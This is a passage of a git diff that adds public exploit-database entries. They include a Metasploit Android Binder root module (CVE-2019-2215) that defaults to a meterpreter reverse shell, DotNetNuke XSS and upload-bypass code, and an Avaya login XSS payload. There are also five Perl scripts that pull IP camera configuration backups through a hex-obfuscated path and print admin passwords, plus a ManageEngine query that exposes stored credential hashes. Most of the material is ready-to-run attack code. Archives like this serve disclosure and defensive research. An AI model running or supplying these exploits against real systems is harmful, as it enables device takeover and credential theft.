diff --git a/exploits/android/local/48129.rb b/exploits/android/local/48129.rb new file mode 100755 index 000000000..6bcf07326 --- /dev/null +++ b/exploits/android/local/48129.rb @@ -0,0 +1,67 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Common + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super( update_info( info, { + 'Name' => "Android Binder Use-After-Free Exploit", + 'Description' => %q{ + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Jann Horn', # discovery and exploit + 'Maddie Stone', # discovery and exploit + 'grant-h', # Qu1ckR00t + 'timwr', # metasploit module + ], + 'References' => [ + [ 'CVE', '2019-2215' ], + [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ], + [ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ], + [ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ], + ], + 'DisclosureDate' => "Sep 26 2019", + 'SessionTypes' => [ 'meterpreter' ], + 'Platform' => [ "android", "linux" ], + 'Arch' => [ ARCH_AARCH64 ], + 'Targets' => [[ 'Auto', {} ]], + 'DefaultOptions' => + { + 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp', + 'WfsDelay' => 5, + }, + 'DefaultTarget' => 0, + } + )) + end + + def upload_and_chmodx(path, data) + write_file path, data + chmod(path) + register_file_for_cleanup(path) + end + + def exploit + local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2019-2215", "exploit" ) + exploit_data = File.read(local_file, {:mode => 'rb'}) + + workingdir = session.fs.dir.getwd + exploit_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}" + upload_and_chmodx(exploit_file, exploit_data) + payload_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}" + upload_and_chmodx(payload_file, generate_payload_exe) + + print_status("Executing exploit '#{exploit_file}'") + result = cmd_exec("echo '#{payload_file} &' | #{exploit_file}") + print_status("Exploit result:\n#{result}") + end +end \ No newline at end of file diff --git a/exploits/aspx/webapps/48124.txt b/exploits/aspx/webapps/48124.txt new file mode 100644 index 000000000..0620f9632 --- /dev/null +++ b/exploits/aspx/webapps/48124.txt @@ -0,0 +1,21 @@ +# Exploit Title: DotNetNuke 9.5 - Persistent Cross-Site Scripting +# Date: 2020-02-23 +# Exploit Author: Sajjad Pourali +# Vendor Homepage: http://dnnsoftware.com/ +# Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases/download/v9.5.0/DNN_Platform_9.5.0_Install.zip +# Version: <= 9.5 +# CVE : N/A +# More Info: https://medium.com/@SajjadPourali/dnn-dotnetnuke-cms-not-as-secure-as-you-think-e8516f789175 + +DNN allows normal users to upload XML files by using journal tools in their profile. An attacker could upload XML files which may execute malicious scripts in the user’s browser. + +In XML, a namespace is an identifier used to distinguish between XML element names and attribute names which might be the same. One of the standard namespaces is “http://www.w3.org/1999/xhtml” which permits us to run XHTML tags such as + +Though stealing of authentication cookies are not possible at this time (because the authentication’s cookies are set as HttpOnly by default), XSS attacks are not limited to stealing users’ cookies. Using XSS vulnerability, an attacker can perform other more damaging attacks on other or high privileged users, for example, bypassing CSRF protections which allows uploading “aspx” extension files through settings page which leads to upload of backdoor files. \ No newline at end of file diff --git a/exploits/aspx/webapps/48125.txt b/exploits/aspx/webapps/48125.txt new file mode 100644 index 000000000..2c0d49dd8 --- /dev/null +++ b/exploits/aspx/webapps/48125.txt @@ -0,0 +1,70 @@ +# Exploit Title: DotNetNuke 9.5 - File Upload Restrictions Bypass +# Date: 2020-02-23 +# Exploit Author: Sajjad Pourali +# Vendor Homepage: http://dnnsoftware.com/ +# Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases/download/v9.5.0/DNN_Platform_9.5.0_Install.zip +# Version: <= 9.5 +# CVE : N/A +# More Info: https://medium.com/@SajjadPourali/dnn-dotnetnuke-cms-not-as-secure-as-you-think-e8516f789175 + +The DNN has a file upload module for superuser. As a superuser, you can upload files with the following formats — “jpg, jpeg, jpe, gif, bmp, png, svg, ttf, eot, woff, doc, docx, xls, xlsx, ppt, pptx, pdf, txt, xml, xsl, xsd, css, zip, rar, template, htmtemplate, ico, avi, mpg, mpeg, mp3, wmv, mov, wav, mp4, webm, ogv”. + +As a normal user you are allowed to upload files with “bmp,gif,ico,jpeg,jpg,jpe,png,svg” extensions. The same file upload module used for superuser is reused for normal users with extra validation for a few additional extensions e.g. CSS extension is not allowed. + +Unfortunately, only for superuser, whitelisted extension check is performed at the server end. For normal users, extra extension validation is performed at client-side only. Hence, a low privileged normal user can bypass the client-side validation and upload files with extensions which are allowed only for superuser only. + +For example, a normal privileged user can upload a file with extension which is allowed only for superuser, by executing the following code on a browser’s console (in the tab that manages profile’s page has opened). This attack may also be performed using proxy tools such as Burp, ZAP etc. + +dnn.createFileUpload({ + "clientId": "dnn_ctr_EditUser_Profile_ProfileProperties_Photo_PhotoFileControl_FileUploadControl", + "moduleId": "", + "parentClientId": null, + "showOnStartup": true, + "folderPicker": { + "selectedItemCss": "selected-item", + "internalStateFieldId": null, + "disabled": false, + "selectItemDefaultText": "", + "initialState": { + "selectedItem": { + "key": "0", + "value": "My Folder" + } + }, + "onSelectionChanged": [] + }, + "maxFileSize": 299892736, + "maxFiles": 0, + "extensions": ["jpg", "jpeg", "jpe", "gif", "bmp", "png", "svg", "ttf", "eot", "woff", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "txt", "xml", "xsl", "xsd", "css", "zip", "rar", "template", "htmtemplate", "ico", "avi", "mpg", "mpeg", "mp3", "wmv", "mov", "wav", "mp4", "webm", "ogv"], + "resources": { + "title": "Upload Files", + "decompressLabel": "Decompress Zip Files", + "uploadToFolderLabel": "Upload To:", + "dragAndDropAreaTitle": "Drag files here or click to browse", + "uploadFileMethod": "Upload File", + "uploadFromWebMethod": "From URL", + "closeButtonText": "Close", + "uploadFromWebButtonText": "Upload", + "decompressingFile": "Decompressing File", + "fileIsTooLarge": "File size bigger than 286. Mb", + "fileUploadCancelled": "Upload cancelled", + "fileUploadFailed": "Upload failed", + "fileUploaded": "File uploaded", + "emptyFileUpload": "Your browser does not support empty file uploads.", + "fileAlreadyExists": "The file you want to upload already exists in this folder.", + "uploadStopped": "File upload stopped", + "urlTooltip": "Enter Resource URL like https://SomeWebSite.com/Images/About.png", + "keepButtonText": "Keep", + "replaceButtonText": "Replace", + "tooManyFiles": "You cannot upload more than {0} file(s) at once.", + "invalidFileExtensions": "Some selected files with invalid extensions are excluded from upload. You can only upload files with the following extensions: bmp, gif, ico, jpeg, jpg, jpe, png, svg.", + "unzipFilePromptTitle": "Unzip Information", + "unzipFileFailedPromptBody": "

[COUNT] of [TOTAL] file(s) were not extracted because their file types are not supported:

[FILELIST]
", + "unzipFileSuccessPromptBody": "

[TOTAL] of [TOTAL] file(s) were extracted successfully.

", + "errorDialogTitle": "Error" + }, + "width": 780, + "height": 630, + "folderPath": dnn.dnnFileUpload.settings.dnn_ctr_EditUser_Profile_ProfileProperties_Photo_PhotoFileControl_dnnFileUploadScope.folder, + "parameters": {} +}); \ No newline at end of file diff --git a/exploits/hardware/webapps/48105.txt b/exploits/hardware/webapps/48105.txt new file mode 100644 index 000000000..99c5fccef --- /dev/null +++ b/exploits/hardware/webapps/48105.txt @@ -0,0 +1,17 @@ +# Exploit Title: Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting +# Release Date: 2019-12-11 +# Exploit Authors: Dan Bohan, Scott Goodwin, OCD Tech +# Vendor Homepage: https://www.avaya.com/en/ +# Software Link: https://www.avaya.com/en/products/unified-communications/voip/ +# Vulnerable Version: 11.0 FP4 SP1 and before +# Tested on: 11.0.0.0 +# CVE: CVE-2019-7004 +# Vendor Advisory: ASA-2019-213 +# References: https://downloads.avaya.com/css/P8/documents/101062833 +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7004 + +Avaya IP Office version 11.0.0.0 and before has a vulnerable login page (username) which is susceptible to cross-site scripting (XSS) via a POST request due to improper sanitization of user input. XSS via a post request allows for arbitrary code to be executed on the client’s system in the security context of the browser. By submitting a specially crafted username, it is possible to execute arbitrary JavaScript. + +# PoC +Username: 41529%22%2F%3E%0A%3Cscript%3Ealert%28%27XSS%21%27%29%3B%3C%2Fscript%3E +Password: Anything \ No newline at end of file diff --git a/exploits/hardware/webapps/48107.pl b/exploits/hardware/webapps/48107.pl new file mode 100755 index 000000000..1f6db55ce --- /dev/null +++ b/exploits/hardware/webapps/48107.pl @@ -0,0 +1,92 @@ +# Title: ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure +# Author: Todor Donev +# Date: 2020-02-23 +# Vendor: www.escam.cn +# Product Link: http://www.escam.cn/search/?class1=&class2=&class3=&searchtype=0&searchword=qd-900&lang=en +# CVE: N/A + + +#!/usr/bin/perl +# +# ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure +# +# Copyright 2020 (c) Todor Donev +# +# https://donev.eu/ +# +# Disclaimer: +# This or previous programs are for Educational purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages +# caused by direct or indirect use of the information or functionality provided by these programs. +# The author or any Internet provider bears NO responsibility for content or misuse of these programs +# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, +# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# (Dont do anything without permissions) +# +# [ ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure +# [ =========================================================== +# [ Exploit Author: Todor Donev 2020 +# [ Initializing the browser +# [ >> User-Agent => Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.5) Gecko/20050105 Epiphany/1.4.8 +# [ >> Content-Type => application/x-www-form-urlencoded +# [ << Connection => close +# [ << Date => Fri, 21 Feb 2020 20:23:56 GMT +# [ << Accept-Ranges => bytes +# [ << Server => thttpd/2.25b 29dec2003 +# [ << Content-Length => 25003 +# [ << Content-Type => application/octet-stream +# [ << Last-Modified => Fri, 21 Feb 2020 20:23:55 GMT +# [ << Client-Date => Fri, 21 Feb 2020 20:23:57 GMT +# [ << Client-Peer => 192.168.1.105:8000 +# [ << Client-Response-Num => 1 +# [ +# [ Username : admin +# [ Password : admin + +use strict; +use HTTP::Request; +use LWP::UserAgent; +use WWW::UserAgent::Random; +use Gzip::Faster 'gunzip'; + +my $host = shift || ''; # Full path url to the store +my $cmd = shift || ''; # show - Show configuration dump +$host =~ s/\/$//; +print "\033[2J"; #clear the screen +print "\033[0;0H"; #jump to 0,0 +print "[ ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure\n"; +print "[ ===========================================================\n"; +print "[ Exploit Author: Todor Donev 2020 \n"; +if ($host !~ m/^http/){ + print "[ Usage, Password Disclosure: perl $0 https://target:port/\n"; + print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n"; + exit; +} +print "[ Initializing the browser\n"; +my $user_agent = rand_ua("browsers"); +my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 }); + $browser->timeout(30); + $browser->agent($user_agent); +# my $target = $host."/tmpfs/config_backup.bin"; +my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69"; +my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]); +my $response = $browser->request($request) or die "[ Exploit Failed: $!"; +print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names; +print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names; +print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200); +my $gzipped = $response->content(); +my $config = gunzip($gzipped); +print "[ \n"; +if ($cmd =~ /show/) { + print "[ >> Configuration dump...\n[\n"; + print "[ ", $_, "\n" for split(/\n/,$config); + exit; +} else { + print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/); + print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/); + exit; +} \ No newline at end of file diff --git a/exploits/hardware/webapps/48110.txt b/exploits/hardware/webapps/48110.txt new file mode 100644 index 000000000..6e7f0a326 --- /dev/null +++ b/exploits/hardware/webapps/48110.txt @@ -0,0 +1,92 @@ +# Exploit Title: SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure +# Author: Todor Donev +# Date: 2020-02-23 +# Vendor: https://secu.jp/ +# Product Link: https://secu.jp/support/831nh1.html +# CVE: N/A + +# +# SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure +# +# Copyright 2020 (c) Todor Donev +# +# https://donev.eu/ +# +# Disclaimer: +# This or previous programs are for Educational purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages +# caused by direct or indirect use of the information or functionality provided by these programs. +# The author or any Internet provider bears NO responsibility for content or misuse of these programs +# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, +# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# (Dont do anything without permissions) +# +# [ SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure +# [ =============================================================== +# [ Exploit Author: Todor Donev 2020 +# [ Initializing the browser +# [ >> User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko) +# [ >> Content-Type => application/x-www-form-urlencoded +# [ << Connection => close +# [ << Date => Fri, 21 Feb 2020 21:11:37 GMT +# [ << Accept-Ranges => bytes +# [ << Server => thttpd/2.25b 29dec2003 +# [ << Content-Length => 32333 +# [ << Content-Type => application/octet-stream +# [ << Last-Modified => Fri, 21 Feb 2020 21:11:36 GMT +# [ << Client-Date => Fri, 21 Feb 2020 21:12:23 GMT +# [ << Client-Peer => 192.168.100.200:81 +# [ << Client-Response-Num => 1 +# [ +# [ Username : admin +# [ Password : admin + +#!/usr/bin/perl + +use strict; +use HTTP::Request; +use LWP::UserAgent; +use WWW::UserAgent::Random; +use Gzip::Faster 'gunzip'; + +my $host = shift || ''; # Full path url to the store +my $cmd = shift || ''; # show - Show configuration dump +$host =~ s/\/$//; +print "\033[2J"; #clear the screen +print "\033[0;0H"; #jump to 0,0 +print "[ SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure\n"; +print "[ ===============================================================\n"; +print "[ Exploit Author: Todor Donev 2020 \n"; +if ($host !~ m/^http/){ + print "[ Usage, Password Disclosure: perl $0 https://target:port/\n"; + print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n"; + exit; +} +print "[ Initializing the browser\n"; +my $user_agent = rand_ua("browsers"); +my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 }); + $browser->timeout(30); + $browser->agent($user_agent); +# my $target = $host."/tmpfs/config_backup.bin"; +my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69"; +my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]); +my $response = $browser->request($request) or die "[ Exploit Failed: $!"; +print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names; +print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names; +print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200); +my $gzipped = $response->content(); +my $config = gunzip($gzipped); +print "[ \n"; +if ($cmd =~ /show/) { + print "[ >> Configuration dump...\n[\n"; + print "[ ", $_, "\n" for split(/\n/,$config); + exit; +} else { + print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/); + print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/); + exit; +} \ No newline at end of file diff --git a/exploits/hardware/webapps/48115.pl b/exploits/hardware/webapps/48115.pl new file mode 100755 index 000000000..60dbc08f4 --- /dev/null +++ b/exploits/hardware/webapps/48115.pl @@ -0,0 +1,91 @@ +# Exploit Title: SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure +# Author: Todor Donev +# Date: 2020-02-23 +# Vendor: https://secu.jp/ +# Product Link: https://secu.jp/support/831.html +# CVE: N/A + +#!/usr/bin/perl +# +# SecuSTATION SC-831 HD Camera Remote Configuration Disclosure +# +# Copyright 2020 (c) Todor Donev +# +# https://donev.eu/ +# +# Disclaimer: +# This or previous programs are for Educational purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages +# caused by direct or indirect use of the information or functionality provided by these programs. +# The author or any Internet provider bears NO responsibility for content or misuse of these programs +# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, +# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# (Dont do anything without permissions) +# +# [ SecuSTATION SC-831 HD Camera Remote Configuration Disclosure +# [ ============================================================ +# [ Exploit Author: Todor Donev 2020 +# [ Initializing the browser +# [ >> User-Agent => Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b3pre) Gecko/20081208 SeaMonkey/2.0a3pre +# [ >> Content-Type => application/x-www-form-urlencoded +# [ << Connection => close +# [ << Date => Fri, 21 Feb 2020 20:36:59 GMT +# [ << Accept-Ranges => bytes +# [ << Server => thttpd/2.25b 29dec2003 +# [ << Content-Length => 25760 +# [ << Content-Type => application/octet-stream +# [ << Last-Modified => Fri, 21 Feb 2020 20:36:57 GMT +# [ << Client-Date => Fri, 21 Feb 2020 20:37:01 GMT +# [ << Client-Peer => 192.168.1.208:80 +# [ << Client-Response-Num => 1 +# [ +# [ Username : admin +# [ Password : admin + +use strict; +use HTTP::Request; +use LWP::UserAgent; +use WWW::UserAgent::Random; +use Gzip::Faster 'gunzip'; + +my $host = shift || ''; # Full path url to the store +my $cmd = shift || ''; # show - Show configuration dump +$host =~ s/\/$//; +print "\033[2J"; #clear the screen +print "\033[0;0H"; #jump to 0,0 +print "[ SecuSTATION SC-831 HD Camera Remote Configuration Disclosure\n"; +print "[ ============================================================\n"; +print "[ Exploit Author: Todor Donev 2020 \n"; +if ($host !~ m/^http/){ + print "[ Usage, Password Disclosure: perl $0 https://target:port/\n"; + print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n"; + exit; +} +print "[ Initializing the browser\n"; +my $user_agent = rand_ua("browsers"); +my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 }); + $browser->timeout(30); + $browser->agent($user_agent); +# my $target = $host."/tmpfs/config_backup.bin"; +my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69"; +my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]); +my $response = $browser->request($request) or die "[ Exploit Failed: $!"; +print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names; +print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names; +print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200); +my $gzipped = $response->content(); +my $config = gunzip($gzipped); +print "[ \n"; +if ($cmd =~ /show/) { + print "[ >> Configuration dump...\n[\n"; + print "[ ", $_, "\n" for split(/\n/,$config); + exit; +} else { + print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/); + print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/); + exit; +} \ No newline at end of file diff --git a/exploits/hardware/webapps/48118.txt b/exploits/hardware/webapps/48118.txt new file mode 100644 index 000000000..876c51183 --- /dev/null +++ b/exploits/hardware/webapps/48118.txt @@ -0,0 +1,91 @@ +# Exploit Title: I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure +# Author: Todor Donev +# Date: 2020-02-23 +# Vendor: https://www.revotec.com/ +# Product Link: +# CVE: N/A + +#!/usr/bin/perl +# +# Revotech I6032B-P POE 1920x1080P 2.0MP Outdoor Camera Remote Configuration Disclosure +# +# Copyright 2020 (c) Todor Donev +# +# https://donev.eu/ +# +# Disclaimer: +# This or previous programs are for Educational purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages +# caused by direct or indirect use of the information or functionality provided by these programs. +# The author or any Internet provider bears NO responsibility for content or misuse of these programs +# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, +# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# (Dont do anything without permissions) +# +# [ Revotech I6032B-P POE 1920x1080P 2.0MP Outdoor Camera Remote Configuration Disclosure +# [ ===================================================================================== +# [ Exploit Author: Todor Donev 2020 -- https://donev.eu/ +# [ Initializing the browser +# [ >> User-Agent => Emacs-W3/4.0pre.46 URL/p4.0pre.46 (i686-pc-linux; X11) +# [ >> Content-Type => application/x-www-form-urlencoded +# [ << Connection => close +# [ << Date => Sun, 23 Feb 2020 10:57:32 GMT +# [ << Accept-Ranges => bytes +# [ << Server => thttpd/2.25b 29dec2003 +# [ << Content-Length => 23876 +# [ << Content-Type => application/octet-stream +# [ << Last-Modified => Sun, 23 Feb 2020 10:57:32 GMT +# [ << Client-Date => Sun, 23 Feb 2020 10:57:44 GMT +# [ << Client-Response-Num => 1 +# [ +# [ Username : admin +# [ Password : admin + +use strict; +use HTTP::Request; +use LWP::UserAgent; +use WWW::UserAgent::Random; +use Gzip::Faster 'gunzip'; + +my $host = shift || ''; # Full path url to the store +my $cmd = shift || ''; # show - Show configuration dump +$host =~ s/\/$//; +print "\033[2J"; #clear the screen +print "\033[0;0H"; #jump to 0,0 +print "[ Revotech I6032B-P POE 1920x1080P 2.0MP Outdoor Camera Remote Configuration Disclosure\n"; +print "[ =====================================================================================\n"; +print "[ Exploit Author: Todor Donev 2020 -- https://donev.eu/\n"; +if ($host !~ m/^http/){ + print "[ Usage, Password Disclosure: perl $0 https://target:port/\n"; + print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n"; + exit; +} +print "[ Initializing the browser\n"; +my $user_agent = rand_ua("browsers"); +my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 }); + $browser->timeout(30); + $browser->agent($user_agent); +# my $target = $host."/config_backup.bin"; +# my $target = $host."/tmpfs/config_backup.bin"; +my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69"; +my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]); +my $response = $browser->request($request) or die "[ Exploit Failed: $!"; +print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names; +print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names; +print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200); +my $gzipped = $response->content(); +my $config = gunzip($gzipped); +print "[ \n"; +if ($cmd =~ /show/) { + print "[ >> Configuration dump...\n[\n"; + print "[ ", $_, "\n" for split(/\n/,$config); + exit; +} else { + print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/); + print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/); + exit; +} \ No newline at end of file diff --git a/exploits/hardware/webapps/48127.pl b/exploits/hardware/webapps/48127.pl new file mode 100755 index 000000000..75d5687a2 --- /dev/null +++ b/exploits/hardware/webapps/48127.pl @@ -0,0 +1,92 @@ +# Exploit Title: Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure +# Author: Todor Donev +# Date: 2020-02-23 +# Vendor: https://acesecurity.jp +# Product Link: https://acesecurity.jp/support/top/wip_series/wip-90113 +# CVE: N/A + +#!/usr/bin/perl +# +# ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure +# +# Copyright 2020 (c) Todor Donev +# +# https://donev.eu/ +# +# Disclaimer: +# This or previous programs are for Educational purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages +# caused by direct or indirect use of the information or functionality provided by these programs. +# The author or any Internet provider bears NO responsibility for content or misuse of these programs +# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, +# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# (Dont do anything without permissions) +# +# [ ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure +# [ ================================================================ +# [ Exploit Author: Todor Donev 2020 +# [ Initializing the browser +# [ >> User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko) +# [ >> Content-Type => application/x-www-form-urlencoded +# [ << Connection => close +# [ << Date => Sat, 22 Feb 2020 14:10:01 GMT +# [ << Accept-Ranges => bytes +# [ << Server => thttpd/2.25b 29dec2003 +# [ << Content-Length => 25893 +# [ << Content-Type => application/octet-stream +# [ << Last-Modified => Sat, 22 Feb 2020 14:10:00 GMT +# [ << Client-Date => Sat, 22 Feb 2020 14:10:04 GMT +# [ << Client-Peer => 192.168.200.49:8080 +# [ << Client-Response-Num => 1 +# [ +# [ Username : admin +# [ Password : admin + +use strict; +use HTTP::Request; +use LWP::UserAgent; +use WWW::UserAgent::Random; +use Gzip::Faster 'gunzip'; + +my $host = shift || ''; # Full path url to the store +my $cmd = shift || ''; # show - Show configuration dump +$host =~ s/\/$//; +print "\033[2J"; #clear the screen +print "\033[0;0H"; #jump to 0,0 +print "[ ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure\n"; +print "[ ================================================================\n"; +print "[ Exploit Author: Todor Donev 2020 \n"; +if ($host !~ m/^http/){ + print "[ Usage, Password Disclosure: perl $0 https://target:port/\n"; + print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n"; + exit; +} +print "[ Initializing the browser\n"; +my $user_agent = rand_ua("browsers"); +my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 }); + $browser->timeout(30); + $browser->agent($user_agent); +# my $target = $host."/config_backup.bin"; +# my $target = $host."/tmpfs/config_backup.bin"; +my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69"; +my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]); +my $response = $browser->request($request) or die "[ Exploit Failed: $!"; +print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names; +print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names; +print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200); +my $gzipped = $response->content(); +my $config = gunzip($gzipped); +print "[ \n"; +if ($cmd =~ /show/) { + print "[ >> Configuration dump...\n[\n"; + print "[ ", $_, "\n" for split(/\n/,$config); + exit; +} else { + print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/); + print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/); + exit; +} \ No newline at end of file diff --git a/exploits/java/webapps/48119.txt b/exploits/java/webapps/48119.txt new file mode 100644 index 000000000..67236c4f3 --- /dev/null +++ b/exploits/java/webapps/48119.txt @@ -0,0 +1,79 @@ +# Exploit Title: ManageEngine EventLog Analyzer 10.0 - Information Disclosure +# Date: 2020-02-23 +# Author:Scott Goodwin +# Vendor: https://www.manageengine.com/ +# Software Link: https://www.manageengine.com/products/eventlog/ +# CVE: CVE-2019-19774 + +Vulnerability Name: Authenticated Information Disclosure in ManageEngine EventLog Analyzer +Registered: CVE-2019-19774 + +Discoverer: +Scott Goodwin, OSCP +OCD Tech + +Vendor of Product: +ManageEngine + +Affected Product Code Base: +EventLog Analyzer - 10.0 SP1 + +Affected Component: +Affected ManageEngine endpoint: http://exampleclient:8400/event/runquery.do +This endpoint allows the ManageEngine user to execute commands against the +ManageEngine PostgreSQL database. + +Attack Type: +Remote + +Vulnerability Type: +Incorrect Access Control + +Vulnerability Impact: +Authenticated Information Disclosure + +Attack Vector: +To exploit the vulnerability, an authenticated user must execute a specially crafted +query against the ManageEngine database to bypass the built-in security controls and +extract credential data. + +Vulnerability Description: +An issue was discovered in Zoho ManageEngine EventLog Analyzer 10.0 SP1. +By running "select hostdetails from hostdetails" at the /event/runquery.do endpoint, +it is possible to bypass the security restrictions that prevent even administrative +users from viewing credential data stored in the database, and recover the MD5 hashes +of the accounts used to authenticate the ManageEngine platform to the managed machines +on the network (most often administrative accounts). Specifically, this bypasses the +following restrictions: a query cannot mention "password", and a query result cannot +have a "password" column. + +PoC: Run the database query: "select hostdetails from hostdetails" at the /event/runquery.do endpoint + +Reporting Timeline: +10/30/2019: This vulnerability was reported to ManageEngine via the +Zoho/ManageEngine Bug Bounty program. They acknowledged the initial report. +12/12/2019: Vulnerability registered +12/13/2019: Vulnerability acknowledged and update (12110) made available to ManageEngine +customers. +12/13/2019: Public disclosure + +Additional Information: +This query bypasses the following security restrictions implemented within Manage Engine: + 1. restrictions on queries that include the word "password". This query will output the + value stored in the "password" field, without the word "password" actually appearing in + the query. If the query contains the word "password" Manage Engine will not execute the query. + 2. restrictions on printing the password field to the screen in a column called "password". + If the results of the query include a columncalled "password", Manage Engine will mask the + password with a series of asterisks "". This query will output the entire contents of the table, + without formatting is as a table within the web interface, which 